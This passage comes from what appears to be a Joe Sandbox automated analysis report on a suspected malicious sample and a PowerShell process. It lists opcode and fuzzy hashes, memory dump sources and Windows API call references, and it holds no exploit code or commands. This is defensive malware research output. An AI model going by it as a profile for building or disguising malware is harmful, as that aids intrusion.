                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                            • String ID:
                                                                            • API String ID: 2102729457-0
                                                                            • Opcode ID: d9dd720f51eef3d3fbe94177486472338db653888b87da4332a276649b206b5d
                                                                            • Instruction ID: fe37ef1f42e63d928baf9b7628c588a3f0f600393ee4f6b464cc40035c08f26a
                                                                            • Opcode Fuzzy Hash: d9dd720f51eef3d3fbe94177486472338db653888b87da4332a276649b206b5d
                                                                            • Instruction Fuzzy Hash: FAF03A30945620EFC7216B64FE0C99B7B65BB04B0174549BEF444F11A8CBB54881CA9C
                                                                            APIs
                                                                            • IsWindowVisible.USER32(?), ref: 00405253
                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 004052A4
                                                                              • Part of subcall function 0040422D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                            • String ID:
                                                                            • API String ID: 3748168415-3916222277
                                                                            • Opcode ID: 085acd60d741280dfa694cfa38d19dbe5f2a98386977293df9f6c8f4e56f0e62
                                                                            • Instruction ID: c9233ab90339d663537cd0f4838c8d9c3e37dbb77af5ce129741796423ccaa39
                                                                            • Opcode Fuzzy Hash: 085acd60d741280dfa694cfa38d19dbe5f2a98386977293df9f6c8f4e56f0e62
                                                                            • Instruction Fuzzy Hash: 4701717160060CABDF218F11ED80A9B3766EF94355F10447AF604752D0C77AAD929E2D
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,774D3420,0040389D,004036B3,00000006,?,00000006,00000008,0000000A), ref: 004038DF
                                                                            • GlobalFree.KERNEL32(?), ref: 004038E6
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004038D7
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Free$GlobalLibrary
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 1100898210-2145255484
                                                                            • Opcode ID: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                                                            • Instruction ID: 4defd9e359f6bb8273ced32a5a12906ada9a5e6c3dc807c4d7f8d8681d186cd1
                                                                            • Opcode Fuzzy Hash: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                                                            • Instruction Fuzzy Hash: 68E01233901520AFCA216F55ED04B5E77ADAF58B22F09417BF8807B2608B785C929BD8
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(00438800,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B6F
                                                                            • CharPrevW.USER32(00438800,00000000,00438800,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B7F
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CharPrevlstrlen
                                                                            • String ID: C:\Users\user\Desktop
                                                                            • API String ID: 2709904686-3080008178
                                                                            • Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                                            • Instruction ID: 4f2c6dc630764ad6ed400a220cd41f8d0a4aff102c3f5ecc88be1499634875f0
                                                                            • Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                                            • Instruction Fuzzy Hash: F7D05EB2401920DAC3126704DC04DAF73A8EF12300746446AF841A6165D7786D818AAC
                                                                            APIs
                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CB3
                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405CCB
                                                                            • CharNextA.USER32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CDC
                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE5
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 190613189-0
                                                                            • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                            • Instruction ID: b35bc10bc40a781af4b0b0b13ea0e0b48c2ad23c6ba402853768862ad0a65ea6
                                                                            • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                            • Instruction Fuzzy Hash: 2CF0F631204918FFDB02DFA4CD4099FBBA8EF06350B2540BAE841FB311D634DE01ABA8
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2405084952.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_78c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: x.k$x.k$x.k$-k$-k
                                                                            • API String ID: 0-1059763770
                                                                            • Opcode ID: 92d4bc781a1eff893131cff454b95019e84076abb8296290127c44afaad5c297
                                                                            • Instruction ID: f6e9c7c35afe63ac7a1fd861a7beee3ec478acc102c6b8e43d7d4603505846ac
                                                                            • Opcode Fuzzy Hash: 92d4bc781a1eff893131cff454b95019e84076abb8296290127c44afaad5c297
                                                                            • Instruction Fuzzy Hash: 290351B4A01319DFE724DB54C850BDAB7B2BF89314F1084A9D919AB781CB71ED82CF91
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2400656709.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_4a30000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6510e7129b4cfcf07667a892888ece8acd1dfd60c6c3b4573c72ff9a2bf028e2
                                                                            • Instruction ID: 61409219b6a434dcc39865555804fdc36950d4382fe7dcf217a5169cc98c8daa
                                                                            • Opcode Fuzzy Hash: 6510e7129b4cfcf07667a892888ece8acd1dfd60c6c3b4573c72ff9a2bf028e2
                                                                            • Instruction Fuzzy Hash: 62B15E70E00219DFDB10CFA9D88579EBBF2BF88745F148529E815E7294FB74A842CB81
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2400656709.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_4a30000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d4b48bbee61132416734def11f73d26bedbd6621f9b7d28de31f8a9df898a515
                                                                            • Instruction ID: 4490584ea66b13d5d8269d7bd59827a7d2f66d85d5311d80f25ab34619163872
                                                                            • Opcode Fuzzy Hash: d4b48bbee61132416734def11f73d26bedbd6621f9b7d28de31f8a9df898a515
                                                                            • Instruction Fuzzy Hash: 78B14C71E102499FDF10CFA9D88179EBBF2BF88315F148529F415EB2A4EB74A845CB81
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2405084952.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_78c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: x.k$x.k$-k$-k
                                                                            • API String ID: 0-365018178
                                                                            • Opcode ID: 58bd468c1fc4f9e2cd61674581cc97251106daac0ce7b82a5aec42bbb7ffb00f
                                                                            • Instruction ID: f0ac34622d9db8785278a0818333f07ac2b82f9862da3de32e296cf78fee1647
                                                                            • Opcode Fuzzy Hash: 58bd468c1fc4f9e2cd61674581cc97251106daac0ce7b82a5aec42bbb7ffb00f
                                                                            • Instruction Fuzzy Hash: 5BC26274E01318AFE724DB54C950BDAB7B2AF89314F1084ADD919AB785CB31ED82CF91
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2405084952.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_78c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: x.k$-k
                                                                            • API String ID: 0-766683181
                                                                            • Opcode ID: 681c7edf6a7140d12aa401bd5a67d766270acc54fca8600ccdd774617d1c3fb4
                                                                            • Instruction ID: 7d30cdb70f3d43ad0db8440b47408a1c63b4e1361cac0421b06d5a7ccc429afa
                                                                            • Opcode Fuzzy Hash: 681c7edf6a7140d12aa401bd5a67d766270acc54fca8600ccdd774617d1c3fb4
                                                                            • Instruction Fuzzy Hash: D182A7B0E00219DFE724DF64C850B9AB7B2AB99304F10C5AED55AAB744CB71ED82CF51
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2405084952.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_78c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: x.k$-k
                                                                            • API String ID: 0-766683181
                                                                            • Opcode ID: 5691ba88f2d2d6cceaad080fa3ac01d05f3aaa7fa4ddf4e5cc26c2123d6c5c25
                                                                            • Instruction ID: a1965f4027783def18a1bb3a5f277ec963c178a825365c228833477da85abcb5
                                                                            • Opcode Fuzzy Hash: 5691ba88f2d2d6cceaad080fa3ac01d05f3aaa7fa4ddf4e5cc26c2123d6c5c25
                                                                            • Instruction Fuzzy Hash: 4E6274B0E00218DFE724DB64C850B9EB7B2AB99304F10C5AED55AAB745CB71ED82CF51
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2405084952.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_78c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: x.k$-k
                                                                            • API String ID: 0-766683181
                                                                            • Opcode ID: cb9e8ccae0faf27501e418b906522254a78721354d744890e569891efd6a9a22
                                                                            • Instruction ID: b0b3cacb918ac0e19b0917bee5fc6e423296729444e1742d53f5de5049395802
                                                                            • Opcode Fuzzy Hash: cb9e8ccae0faf27501e418b906522254a78721354d744890e569891efd6a9a22
                                                                            • Instruction Fuzzy Hash: A65285B0A00218DFE724DB64C850B9AB7B2BB99304F10C5AED55AAB745CB71ED82CF51
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2405084952.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_78c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: x.k$-k
                                                                            • API String ID: 0-766683181
                                                                            • Opcode ID: 9b57f9aa51a697e501755366cce8a901a97f9a2fb80e80eed615a196e2367401
                                                                            • Instruction ID: 601f0db11f4f588ec8ca7e4a6c786fd1f6e3294d37ffdee44c9290f588fac488
                                                                            • Opcode Fuzzy Hash: 9b57f9aa51a697e501755366cce8a901a97f9a2fb80e80eed615a196e2367401
                                                                            • Instruction Fuzzy Hash: 17427170B01319AFE724DB54C950BDAB7B2AB89314F1084ADD919AB785CB31ED82CF91
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2405084952.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_78c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: x.k$-k
                                                                            • API String ID: 0-766683181
                                                                            • Opcode ID: ef84cf1540b8e1386a06f212141a2841b1aa4afe0ac3d51c7de536ea01c028d7
                                                                            • Instruction ID: c9c504ef32eca384a83c26fb2a9548239634c75327eacfd9abf3521d610ea66e
                                                                            • Opcode Fuzzy Hash: ef84cf1540b8e1386a06f212141a2841b1aa4afe0ac3d51c7de536ea01c028d7
                                                                            • Instruction Fuzzy Hash: 88E191B0B012099FEB14DF94C840B9EBBB2AF88704F25C46DD501AF795CB76EC428B95
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2405084952.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_78c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: x.k$-k
                                                                            • API String ID: 0-766683181
                                                                            • Opcode ID: 82adb624b2171964cc4342bb2926be9d35954a9953bea238abe6c010a5eac03a
                                                                            • Instruction ID: 62fa5daf2dc62ee4d3ee24e4cbd7bf97e82ae26b671a8b3c21fd4b1323b7cc90
                                                                            • Opcode Fuzzy Hash: 82adb624b2171964cc4342bb2926be9d35954a9953bea238abe6c010a5eac03a
                                                                            • Instruction Fuzzy Hash: 45C1AFB0B012059FEB14CF94C840B9EBBB2AF88314F25C46DE505AF795CB76EC428B95
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2405084952.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_78c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: x.k$-k
                                                                            • API String ID: 0-766683181
                                                                            • Opcode ID: de8a2a53226bd9a4a5d34298d2f324bdc5f333530b1e8df49f71ff55c509615b
                                                                            • Instruction ID: bf01a3b154e9f80d03df70c59f16dbb00296a4a1e30cb95f2d6666fd782fcf9d
                                                                            • Opcode Fuzzy Hash: de8a2a53226bd9a4a5d34298d2f324bdc5f333530b1e8df49f71ff55c509615b
                                                                            • Instruction Fuzzy Hash: 44C19CB0A01205DFEB14CF98C940B9DBBB2AF98304F24C429E501AF795CB72EC42CB95
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2405084952.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_78c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: x.k$-k
                                                                            • API String ID: 0-766683181
                                                                            • Opcode ID: c643076a7834652aec498ab0f425835af3ac28a71adb7c00ea4ed85bedfde963
                                                                            • Instruction ID: de341a45719b58e7d5a78b41f080e6cfa2f33cee42e4fc2e975bd456f5d3d900
                                                                            • Opcode Fuzzy Hash: c643076a7834652aec498ab0f425835af3ac28a71adb7c00ea4ed85bedfde963
                                                                            • Instruction Fuzzy Hash: F0B19DB0A01205DFEB14CF98C940B9DBBB2AF98304F24C469E505AF795CB76EC42CB95
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2405084952.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_78c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: x.k
                                                                            • API String ID: 0-3814145804
                                                                            • Opcode ID: 14ac2fa051edafe0464a6961a64be4d722086285da1f8f9bc477ec17e620ebcd
                                                                            • Instruction ID: 008c2254053e6750c5e9818eda9e7705cc45f6d958d9021b4371d3e7de2441a0
                                                                            • Opcode Fuzzy Hash: 14ac2fa051edafe0464a6961a64be4d722086285da1f8f9bc477ec17e620ebcd
                                                                            • Instruction Fuzzy Hash: 7D12FAB0A01219DFEB24DF64C850BA9B7B2BB59304F1084EAD949EB791CB71ED81CF51
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2405084952.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_78c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: x.k
                                                                            • API String ID: 0-3814145804
                                                                            • Opcode ID: 55fc255a01d177b1e71523ca58bfe22ffe638ec61f2c0eb1ea315c7addb86008
                                                                            • Instruction ID: f7be556db56de0494425f42bc5ab7e39cbbb496a25b8aacd9dc8d1bb9f4d5471
                                                                            • Opcode Fuzzy Hash: 55fc255a01d177b1e71523ca58bfe22ffe638ec61f2c0eb1ea315c7addb86008
                                                                            • Instruction Fuzzy Hash: B212F9B0A00219DFEB24DF64C944BE9B7B2BB59304F1084A9E909EB790CB71ED81CF51
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2405084952.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_78c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: x.k
                                                                            • API String ID: 0-3814145804
                                                                            • Opcode ID: d093469e740c69cb7f474dfe6d06b1b6614de8ee7499803e7f59dadd2650b80c
                                                                            • Instruction ID: 56532131229751eb1851254e322f6be557f09945d5a2d0e16496658c846d4f93
                                                                            • Opcode Fuzzy Hash: d093469e740c69cb7f474dfe6d06b1b6614de8ee7499803e7f59dadd2650b80c
                                                                            • Instruction Fuzzy Hash: 8D319374B01204AFE714DBA4C851BAE7BA3ABC5714F608429EA016F7D1CFB6DC428BD5
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2405084952.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_78c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 15c7c31294afe1688917f47ae3ac0347920d95d97f947cfbdcd3345980bce504
                                                                            • Instruction ID: 240975c834dc999e0b6351258bc123ae4915b75f5197a91ce4706386fc5e3f50
                                                                            • Opcode Fuzzy Hash: 15c7c31294afe1688917f47ae3ac0347920d95d97f947cfbdcd3345980bce504
                                                                            • Instruction Fuzzy Hash: 1BA264B0B00245DFEB24CBA8C454B99BBB2BB89704F24816DD915AF752CB76EC81CF51
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2405084952.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_78c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0903ce95c4abb8b70168a4be7173462fdfc9e882b71430071eb5f91452bb2505
                                                                            • Instruction ID: cae4edb497040ba5019391480dd1192ccb4f1765229e651fc78aa1771fdece80
                                                                            • Opcode Fuzzy Hash: 0903ce95c4abb8b70168a4be7173462fdfc9e882b71430071eb5f91452bb2505
                                                                            • Instruction Fuzzy Hash: 618261B4A00245DFEB25CFA8C450B99BBB2FB49704F2081ADD915AB752C776EC82CF41
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2405084952.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_78c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3934763a2c2871ecd21199e1ebec553ca93d8722debb8c80f0ee7fff6047ec02
                                                                            • Instruction ID: 9c2c12c2a2dc039cbb091ec8246fb216b185e414a69c2d62277af24bc0c2a577
                                                                            • Opcode Fuzzy Hash: 3934763a2c2871ecd21199e1ebec553ca93d8722debb8c80f0ee7fff6047ec02
                                                                            • Instruction Fuzzy Hash: 33326FB4B012099FE714CB98C484B9ABBF2BF99704F14846AE515EF752CB72DC42CB91
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2400656709.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_4a30000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d65df7e93a9ef1bae73c54206dfa686ec2234397afd0332ccf9264bf2989cb46
                                                                            • Instruction ID: 38c1bc85029bf9ed8ad18fdda429b587aebb61212316c3e02d526965f4a84236
                                                                            • Opcode Fuzzy Hash: d65df7e93a9ef1bae73c54206dfa686ec2234397afd0332ccf9264bf2989cb46
                                                                            • Instruction Fuzzy Hash: D9225D34B002189FDB25DB24C854BAEB7B2BF89315F1480E9D50AAB351DB35EE85CF91
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2400656709.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_4a30000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d1786afa7d52f258a26a943059905edbe4a1020ae9cddf846453b843037d3a9a
                                                                            • Instruction ID: b795655eb1b3c3e3211c52ee057db46ba5c3071f6fc58a8720805f56e3be8e13
                                                                            • Opcode Fuzzy Hash: d1786afa7d52f258a26a943059905edbe4a1020ae9cddf846453b843037d3a9a
                                                                            • Instruction Fuzzy Hash: 1FC1B079A00208DFDB14DFA8D944A9DBBF2FF88311F158569E405AB764EB74EC89CB40
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2400656709.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_4a30000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9db64ae188320ad60d0cdd9ca51b1c1b36b756d0284efc743a415ace8ac9a9bc
                                                                            • Instruction ID: 5d6ca8c3dbf26086ee1beed39e13f74bbae1da362773fc1d97ad7eaea1e77e75
                                                                            • Opcode Fuzzy Hash: 9db64ae188320ad60d0cdd9ca51b1c1b36b756d0284efc743a415ace8ac9a9bc
                                                                            • Instruction Fuzzy Hash: 1AB16D70E00219DFDB10CFA9D88579EBBF2BF88745F148529E815E7294EB74A842CB91
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2400656709.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_4a30000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7f5361f267bc9e0725e3564a3180a1c5c214907fd64cc93f19c8a5c01f12106e
                                                                            • Instruction ID: daf955d72837cce8e68ef0702ea6c738ec69a244bb4baf34db11a7d283f88e48
                                                                            • Opcode Fuzzy Hash: 7f5361f267bc9e0725e3564a3180a1c5c214907fd64cc93f19c8a5c01f12106e
                                                                            • Instruction Fuzzy Hash: 8BB14B70E102499FDB10CFA9D88179EBBF1BF48315F148529F815EB2A4EB74A885CB91
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.2400656709.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_4a30000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
